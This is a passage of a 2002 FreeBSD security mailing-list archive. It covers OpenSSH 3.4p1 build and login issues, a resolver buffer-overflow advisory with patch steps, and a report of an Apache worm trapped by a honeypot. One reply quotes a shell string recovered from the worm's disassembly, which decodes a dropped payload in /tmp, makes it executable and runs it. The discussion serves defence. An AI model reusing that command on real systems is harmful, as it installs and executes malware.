Fri, 28 Jun 2002 02:13:48 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2675C43E09 for ; Fri, 28 Jun 2002 02:13:47 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 8C49C5361; Fri, 28 Jun 2002 11:13:41 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "[brano]" Cc: Subject: Re: OpenSSH_3.4p1 References: <3D1B4E24.1F91E51D@centtech.com> <3D1B5709.8010902@wevers.org> <05d001c21e08$75fc5d00$c28c630a@brano> From: Dag-Erling Smorgrav Date: 28 Jun 2002 11:13:40 +0200 In-Reply-To: <05d001c21e08$75fc5d00$c28c630a@brano> Message-ID: Lines: 10 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "[brano]" writes: > I install OpenSSH_3.4p1 to my FreeBSD 4.5-RELEASE but it doesn't support > compression. There's a bug in the configure script that causes it to believe FreeBSD doesn't have a working mmap(2) syscall. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 3:15:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8CE8337B408 for ; Fri, 28 Jun 2002 03:15:50 -0700 (PDT) Received: from mail.npubs.com (npubs.com [207.111.208.224]) by mx1.FreeBSD.org (Postfix) with ESMTP id 94EAF43E0F for ; Fri, 28 Jun 2002 03:15:46 -0700 (PDT) (envelope-from nielsen@memberwebs.com) Received: 8.12.2-(Neptune) From: "Nielsen" To: "Chris" , References: <200206261908.g5QJ8Nqo035419@freefall.freebsd.org> <200206281235440931.5B17C74F@zorgco.com> Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020628101546.94EAF43E0F@mx1.FreeBSD.org> Date: Fri, 28 Jun 2002 03:15:46 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Nope basically any program that's statically linked ( /bin/* /sbin/* and some others), and your libc libraries need to be rebuilt. Make world is the simplest route out unless you're sure you can catch everything. Sorry bout that Nate ----- Original Message ----- From: "Chris" To: Sent: Thursday, June 27, 2002 20:39 Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Sorry for the newbie question but here goes. Anyone know if we can just recompile kernel after patch? (i.e make make install) or do we have to update src and make world? Any help is greatly appreciated. Chris ------------------------------------------------------------------- On 26/06/2002 at 12:08 PM FreeBSD Security Advisories wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >=========================================================================== == >FreeBSD-SA-02:28.resolv Security >Advisory > The FreeBSD >Project > >Topic: buffer overflow in resolver > >Category: core >Module: libc >Announced: 2002-06-26 >Credits: Joost Pol >Affects: All releases prior to and including 4.6-RELEASE >Corrected: 2002-06-26 06:34:18 UTC (RELENG_4) > 2002-06-26 08:44:24 UTC (RELENG_4_6) > 2002-06-26 18:53:20 UTC (RELENG_4_5) >FreeBSD only: NO > >I. Background > >The resolver implements functions for making, sending and interpreting >query and reply messages with Internet domain name servers. >Hostnames, IP addresses, and other information are queried using the >resolver. > >II. Problem Description > >DNS messages have specific byte alignment requirements, resulting in >padding in messages. In a few instances in the resolver code, this >padding is not taken into account when computing available buffer >space. As a result, the parsing of a DNS message may result in a >buffer overrun of up to a few bytes for each record included in the >message. > >III. Impact > >An attacker (either a malicious domain name server or an agent that >can spoof DNS messages) may produce a specially crafted DNS message >that will exploit this bug when parsed by an application using the >resolver. It may be possible for such an exploit to result in the >execution of arbitrary code with the privileges of the resolver-using >application. Though no exploits are known to exist today, since >practically all Internet applications utilize the resolver, the >severity of this issue is high. > >IV. Workaround > >There is currently no workaround. > >V. Solution > >Do one of the following: > >1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6 >or RELENG_4_5 security branch dated after the correction date >(4.6-RELEASE-p1 or 4.5-RELEASE-p7). > >2) To patch your present system: > >The following patch has been verified to apply to FreeBSD 4.5 and >FreeBSD 4.6 systems. > >a) Download the relevant patch from the location below, and verify the >detached PGP signature using your PGP utility. > ># fetch >ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch ># fetch >ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch.asc > >b) Execute the following commands as root: > ># cd /usr/src ># patch < /path/to/patch > >c) Recompile the operating systems as described in >. > >Note that any statically linked applications that are not part of >the base system (i.e. from the Ports Collection or other 3rd-party >sources) must be recompiled. > >VI. Correction details > >The following list contains the revision numbers of each file that was >corrected in FreeBSD. > >Path Revision > Branch >- ------------------------------------------------------------------------- >src/lib/libc/net/gethostbydns.c > RELENG_4 1.27.2.2 > RELENG_4_6 1.27.10.1 > RELENG_4_5 1.27.8.1 >src/lib/libc/net/getnetbydns.c > RELENG_4 1.13.2.2 > RELENG_4_6 1.13.2.1.8.1 > RELENG_4_5 1.13.2.1.6.1 >src/lib/libc/net/name6.c > RELENG_4 1.6.2.6 > RELENG_4_6 1.6.2.5.8.1 > RELENG_4_5 1.6.2.5.6.1 >src/sys/conf/newvers.sh > RELENG_4_6 1.44.2.23.2.2 > RELENG_4_5 1.44.2.20.2.8 >- ------------------------------------------------------------------------- > >VII. References > > >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1.0.7 (FreeBSD) > >iQCVAwUBPRoQOVUuHi5z0oilAQG3cAP/d7Gb2rdkSjZKCR0NI+QzMibgySVTXOtF >sdoJrYka/XnIpFMVAyXl36bibtRKbwfCyv/rEX39YSas7tqReizwAABoaRF956Qb >qlek1ONvvd+Tj6+WpEEueX/VdPqGQuqMk0BoguIbOgwAya6ZFYJ9ZKAHHSN9YqO8 >ZGTC8pmqfGI= >=s76v >-----END PGP SIGNATURE----- > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security-notifications" in the body of the message Chris Zorg Enterprises To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 3:32:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 08CDC37B405 for ; Fri, 28 Jun 2002 03:32:22 -0700 (PDT) Received: from even.electronics.kiae.ru (ns.electronics.kiae.ru [144.206.12.12]) by mx1.FreeBSD.org (Postfix) with ESMTP id B2BC043E09 for ; Fri, 28 Jun 2002 03:32:20 -0700 (PDT) (envelope-from eustrop@ns.electronics.kiae.ru) Received: from even.electronics.kiae.ru (localhost.electronics.kiae.ru [127.0.0.1]) by even.electronics.kiae.ru (8.12.2/8.12.2) with ESMTP id g5SAdUVl036039 for ; Fri, 28 Jun 2002 14:39:30 +0400 (MSD) (envelope-from eustrop@ns.electronics.kiae.ru) X-Authentication-Warning: even.electronics.kiae.ru: Host localhost.electronics.kiae.ru [127.0.0.1] claimed to be even.electronics.kiae.ru Received: (from eustrop@localhost) by even.electronics.kiae.ru (8.12.2/8.12.2/Submit) id g5SAdU3f036038 for freebsd-security@freebsd.org; Fri, 28 Jun 2002 14:39:30 +0400 (MSD) (envelope-from eustrop) From: Mr Alex V Eustrop Message-Id: <200206281039.g5SAdU3f036038@even.electronics.kiae.ru> Subject: Another openssh/FreeBSD PR To: freebsd-security@freebsd.org Date: Fri, 28 Jun 2002 14:39:29 +0400 (MSD) X-Mailer: ELM [version 2.4ME+ PL95a (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org May be this PR should be revised too (due to current openssh/FBSD activity)? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=bin/37026 sshd on FreeBSD 4.6-RELEASE still coredump in that case. -- Eustrop To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 3:37:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 07E5C37B401 for ; Fri, 28 Jun 2002 03:37:37 -0700 (PDT) Received: from dire.bris.ac.uk (dire.bris.ac.uk [137.222.10.60]) by mx1.FreeBSD.org (Postfix) with ESMTP id E6F8F43E09 for ; Fri, 28 Jun 2002 03:37:31 -0700 (PDT) (envelope-from Jan.Grant@bristol.ac.uk) Received: from mail.ilrt.bris.ac.uk by dire.bris.ac.uk with SMTP-PRIV with ESMTP; Fri, 28 Jun 2002 11:37:24 +0100 Received: from cmjg (helo=localhost) by mail.ilrt.bris.ac.uk with local-esmtp (Exim 3.16 #1) id 17Nt7y-0005WX-00; Fri, 28 Jun 2002 11:37:22 +0100 Date: Fri, 28 Jun 2002 11:37:22 +0100 (BST) From: Jan Grant X-X-Sender: cmjg@mail.ilrt.bris.ac.uk To: Chris Johnson Cc: Emacs , FreeBSD Security Mailling List Subject: Re: Installing openssh-portable 3.4 In-Reply-To: <20020627225747.GA70498@palomine.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 27 Jun 2002, Chris Johnson wrote: > On Thu, Jun 27, 2002 at 05:50:52PM -0500, Emacs wrote: > > I did this as well, but my ssh is hanging at login on 2 of my 4 boxes. > > Any ideas? > > # cp /etc/resolv.conf /usr/local/empty/etc/resolv.conf > # chmod 755 /usr/local/empty > > (If yours is set up with /var/empty instead of /usr/local/empty, make the > appropriate change above.) > > I don't know the implications of having /usr/local/empty with mode 755 instead > of 700. Previous versions of the port created it with 755, while the current > version creates it with 700. It does solve the problem for me. > > I also don't know why this step is necessary sometimes and sometimes not. It > happened on three of the ten or so boxes I installed openssh-portable-3.4p1 on, > and I don't see the rhyme or reason. ReverseMappingCheck no ? -- jan grant, ILRT, University of Bristol. http://www.ilrt.bris.ac.uk/ Tel +44(0)117 9287088 Fax +44 (0)117 9287112 RFC822 jan.grant@bris.ac.uk New Freedom of Information Act: theirs, to yours. Happy now? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 3:44:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5565F37B401 for ; Fri, 28 Jun 2002 03:44:37 -0700 (PDT) Received: from norton.palomine.net (dsl254-102-179.nyc1.dsl.speakeasy.net [216.254.102.179]) by mx1.FreeBSD.org (Postfix) with SMTP id 45F5C43E0A for ; Fri, 28 Jun 2002 03:44:36 -0700 (PDT) (envelope-from cjohnson@palomine.net) Received: (qmail 80770 invoked by uid 1000); 28 Jun 2002 10:44:35 -0000 Date: Fri, 28 Jun 2002 06:44:35 -0400 From: Chris Johnson To: FreeBSD Security Mailling List Subject: Re: Installing openssh-portable 3.4 Message-ID: <20020628104435.GA80604@palomine.net> References: <20020627225747.GA70498@palomine.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="h31gzZEtNLTqOjlF" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --h31gzZEtNLTqOjlF Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jun 28, 2002 at 11:37:22AM +0100, Jan Grant wrote: > On Thu, 27 Jun 2002, Chris Johnson wrote: >=20 > > On Thu, Jun 27, 2002 at 05:50:52PM -0500, Emacs wrote: > > > I did this as well, but my ssh is hanging at login on 2 of my 4 boxes. > > > Any ideas? > > > > # cp /etc/resolv.conf /usr/local/empty/etc/resolv.conf > > # chmod 755 /usr/local/empty > > > > (If yours is set up with /var/empty instead of /usr/local/empty, make t= he > > appropriate change above.) > > > > I don't know the implications of having /usr/local/empty with mode 755 = instead > > of 700. Previous versions of the port created it with 755, while the cu= rrent > > version creates it with 700. It does solve the problem for me. > > > > I also don't know why this step is necessary sometimes and sometimes no= t. It > > happened on three of the ten or so boxes I installed openssh-portable-3= .4p1 on, > > and I don't see the rhyme or reason. >=20 > ReverseMappingCheck no >=20 > ? The configuration files are identical on all the boxes, with VerifyReverseMapping commented out. Chris --h31gzZEtNLTqOjlF Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9HD4SPC78Lz4X/PARArI4AJ9YTG5CmRXqwedVbnMUezzL8QMnsgCgpxyB uM6o1q/XE9Aw8vmnoeymGoQ= =xxlQ -----END PGP SIGNATURE----- --h31gzZEtNLTqOjlF-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 4: 1:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2B83737B405 for ; Fri, 28 Jun 2002 04:01:35 -0700 (PDT) Received: from axis.tdd.lt (axis.tdd.lt [213.197.128.94]) by mx1.FreeBSD.org (Postfix) with ESMTP id E39C043E06 for ; Fri, 28 Jun 2002 04:01:33 -0700 (PDT) (envelope-from domas.mituzas@microlink.lt) Received: from localhost (midom@localhost) by axis.tdd.lt (8.11.6/8.11.6) with ESMTP id g5SB1W770775; Fri, 28 Jun 2002 13:01:32 +0200 (EET) (envelope-from domas.mituzas@microlink.lt) X-Authentication-Warning: axis.tdd.lt: midom owned process doing -bs Date: Fri, 28 Jun 2002 13:01:32 +0200 (EET) From: Domas Mituzas X-X-Sender: midom@axis.tdd.lt To: freebsd-security@freebsd.org Cc: bugtraq@securityfocus.com, Subject: Apache worm in the wild Message-ID: <20020628125817.O68824-100000@axis.tdd.lt> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, our honeypot systems trapped new apache worm(+trojan) in the wild. It traverses through the net, and installs itself on all vulnerable apaches it finds. No source code available yet, but I put the binaries into public place, and more investigation is to be done. http://dammit.lt/apache-worm/ Regards, Domas Mituzas Central systems @ MicroLink Data To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 4:38: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7F66737B401 for ; Fri, 28 Jun 2002 04:38:04 -0700 (PDT) Received: from energyhq.homeip.net (213-97-200-73.uc.nombres.ttd.es [213.97.200.73]) by mx1.FreeBSD.org (Postfix) with ESMTP id EB5D943E06 for ; Fri, 28 Jun 2002 04:38:02 -0700 (PDT) (envelope-from flynn@energyhq.homeip.net) Received: (from flynn@localhost) by energyhq.homeip.net (8.11.6/8.11.3) id g5SBcZ510078; Fri, 28 Jun 2002 13:38:35 +0200 (CEST) Date: Fri, 28 Jun 2002 13:38:34 +0200 From: flynn@energyhq.homeip.net To: Domas Mituzas Cc: freebsd-security@freebsd.org, bugtraq@securityfocus.com, os_bsd@konferencijos.lt Subject: Re: Apache worm in the wild Message-ID: <20020628113834.GA10062@energyhq.homeip.net> References: <20020628125817.O68824-100000@axis.tdd.lt> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="YZ5djTAD1cGYuMQK" Content-Disposition: inline In-Reply-To: <20020628125817.O68824-100000@axis.tdd.lt> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --YZ5djTAD1cGYuMQK Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jun 28, 2002 at 01:01:32PM +0200, Domas Mituzas wrote: Hi, > our honeypot systems trapped new apache worm(+trojan) in the wild. It > traverses through the net, and installs itself on all vulnerable apaches > it finds. No source code available yet, but I put the binaries into public Wow, an interesting puppy. I just ran it through dasm to get the assembler dump. The executable is not even stripped, and makes an interesting read, as it gives lots of information. It looks like it was either coded by someone with little experience or in a hurry, and there are several system calls like this one: Possible reference to string: "/usr/bin/uudecode -p /tmp/.uua > /tmp/.a;killall -9 .a;chmod +x /tmp/.a;ki= llall -9 .a;/ tmp/.a %s;exit;" I wonder how many variants of this kind of thing we'll see, but I assume mo= st people=20 running Apache have upgraded already. Cheers, --=20 Miguel Mendez - flynn@energyhq.homeip.net GPG Public Key :: http://energyhq.homeip.net/files/pubkey.txt EnergyHQ :: http://www.energyhq.tk Of course it runs NetBSD! --YZ5djTAD1cGYuMQK Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (NetBSD) iD8DBQE9HEq6nLctrNyFFPERAjclAKDAHtXw/OPpNX7kpot1s7pJaRH/5gCdF2y9 sOLrvAxOCTBRDYYsM0tq8Cs= =EsOg -----END PGP SIGNATURE----- --YZ5djTAD1cGYuMQK-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 5: 6:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 57C4437B40A for ; Fri, 28 Jun 2002 05:06:08 -0700 (PDT) Received: from temne.zahrobie.sk (temne.zahrobie.sk [212.89.236.90]) by mx1.FreeBSD.org (Postfix) with SMTP id E21BE43E09 for ; Fri, 28 Jun 2002 05:06:00 -0700 (PDT) (envelope-from brano@zahrobie.sk) Received: (qmail 17160 invoked by uid 0); 28 Jun 2002 12:03:27 -0000 Received: from localhost (HELO brano) (127.0.0.1) by localhost with SMTP; 28 Jun 2002 12:03:27 -0000 Message-ID: <077601c21e9c$505f75c0$c28c630a@brano> From: "[brano]" To: "Dag-Erling Smorgrav" Cc: References: <3D1B4E24.1F91E51D@centtech.com> <3D1B5709.8010902@wevers.org><05d001c21e08$75fc5d00$c28c630a@brano> Subject: Re: OpenSSH_3.4p1 Date: Fri, 28 Jun 2002 14:07:01 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1250" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 Disposition-Notification-To: "[brano]" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Dag, Can I fix it ? I need use compression and separation together on FreeBSD ? Is it real ? Thanks Brano from Slovakia ----- Original Message ----- From: "Dag-Erling Smorgrav" To: "[brano]" Cc: Sent: Friday, June 28, 2002 11:13 AM Subject: Re: OpenSSH_3.4p1 > "[brano]" writes: > > I install OpenSSH_3.4p1 to my FreeBSD 4.5-RELEASE but it doesn't support > > compression. > > There's a bug in the configure script that causes it to believe > FreeBSD doesn't have a working mmap(2) syscall. > > DES > -- > Dag-Erling Smorgrav - des@ofug.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 5:10:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 56A5E37B401 for ; Fri, 28 Jun 2002 05:09:58 -0700 (PDT) Received: from norton.palomine.net (dsl254-102-179.nyc1.dsl.speakeasy.net [216.254.102.179]) by mx1.FreeBSD.org (Postfix) with SMTP id 0D01643E1A for ; Fri, 28 Jun 2002 05:09:38 -0700 (PDT) (envelope-from cjohnson@palomine.net) Received: (qmail 90063 invoked by uid 1000); 28 Jun 2002 12:08:56 -0000 Date: Fri, 28 Jun 2002 08:08:56 -0400 From: Chris Johnson To: "[brano]" Cc: security@freebsd.org Subject: Re: OpenSSH_3.4p1 Message-ID: <20020628120856.GA90035@palomine.net> References: <077601c21e9c$505f75c0$c28c630a@brano> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="5mCyUwZo2JvN/JJP" Content-Disposition: inline In-Reply-To: <077601c21e9c$505f75c0$c28c630a@brano> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --5mCyUwZo2JvN/JJP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Fri, Jun 28, 2002 at 02:07:01PM +0200, [brano] wrote: > Can I fix it ? I need use compression and separation together on FreeBSD ? Re-cvsup your ports tree. It's fixed in openssh-portable-3.4p1_1. Chris --5mCyUwZo2JvN/JJP Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9HFHXPC78Lz4X/PARAsG5AJwKn2JwHzV154wtST8YNtrk3+sLTwCggdlN QHZXF0jLZbZWC+3o7kcKtZI= =VWj9 -----END PGP SIGNATURE----- --5mCyUwZo2JvN/JJP-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 5:25: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 17DB537B400 for ; Fri, 28 Jun 2002 05:24:52 -0700 (PDT) Received: from temne.zahrobie.sk (temne.zahrobie.sk [212.89.236.90]) by mx1.FreeBSD.org (Postfix) with SMTP id DDA1A43E18 for ; Fri, 28 Jun 2002 05:24:44 -0700 (PDT) (envelope-from brano@zahrobie.sk) Received: (qmail 17482 invoked by uid 0); 28 Jun 2002 12:22:19 -0000 Received: from localhost (HELO brano) (127.0.0.1) by localhost with SMTP; 28 Jun 2002 12:22:19 -0000 Message-ID: <079c01c21e9e$f31d3980$c28c630a@brano> From: "[brano]" To: "Chris Johnson" Cc: References: <077601c21e9c$505f75c0$c28c630a@brano> <20020628120856.GA90035@palomine.net> Subject: Re: OpenSSH_3.4p1 Date: Fri, 28 Jun 2002 14:25:53 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1250" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 Disposition-Notification-To: "[brano]" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Chris, thanks ;-) But I have one answer. I never user CVS how can I install it ? without Xwin and how can update only one port (not all ports) because I have modified more other ports to fix some problems. Thanks Brano from Slovakia ----- Original Message ----- From: "Chris Johnson" To: "[brano]" Cc: Sent: Friday, June 28, 2002 2:08 PM Subject: Re: OpenSSH_3.4p1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 7: 8:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0190237B406 for ; Fri, 28 Jun 2002 07:08:13 -0700 (PDT) Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by mx1.FreeBSD.org (Postfix) with SMTP id 1DAC443E0A for ; Fri, 28 Jun 2002 07:08:12 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 19157 invoked by uid 1001); 28 Jun 2002 14:08:11 -0000 Date: Fri, 28 Jun 2002 10:08:11 -0400 From: "Peter C. Lai" To: "[brano]" Cc: Chris Johnson , freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH_3.4p1 Message-ID: <20020628100811.A19147@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <077601c21e9c$505f75c0$c28c630a@brano> <20020628120856.GA90035@palomine.net> <079c01c21e9e$f31d3980$c28c630a@brano> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <079c01c21e9e$f31d3980$c28c630a@brano>; from brano@zahrobie.sk on Fri, Jun 28, 2002 at 02:25:53PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org or read this to do the manual patch http://docs.freebsd.org/cgi/getmsg.cgi?fetch=1244997+0+current/freebsd-security (just add #include into configure right before the #include for ) this question has been asked a gazillion times. I guess no one reads the archives before mailing the list anymore. On Fri, Jun 28, 2002 at 02:25:53PM +0200, [brano] wrote: > Hi Chris, > thanks ;-) > But I have one answer. I never user CVS how can I install it ? without Xwin > and how can update only one port (not all ports) because I have modified > more other ports to fix some problems. > Thanks > Brano from Slovakia > > ----- Original Message ----- > From: "Chris Johnson" > To: "[brano]" > Cc: > Sent: Friday, June 28, 2002 2:08 PM > Subject: Re: OpenSSH_3.4p1 > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology | Undergraduate Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 7:12:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6D36237B400 for ; Fri, 28 Jun 2002 07:12:12 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 85BB643E06 for ; Fri, 28 Jun 2002 07:12:11 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 1C0BA5361; Fri, 28 Jun 2002 16:12:03 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "[brano]" Cc: Subject: Re: OpenSSH_3.4p1 References: <3D1B4E24.1F91E51D@centtech.com> <3D1B5709.8010902@wevers.org> <05d001c21e08$75fc5d00$c28c630a@brano> <077601c21e9c$505f75c0$c28c630a@brano> From: Dag-Erling Smorgrav Date: 28 Jun 2002 16:12:02 +0200 In-Reply-To: <077601c21e9c$505f75c0$c28c630a@brano> Message-ID: Lines: 8 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "[brano]" writes: > Can I fix it ? I need use compression and separation together on FreeBSD ? I expect the port will be fixed shortly, just wait for it and upgrade. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 7:12:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E400037B400 for ; Fri, 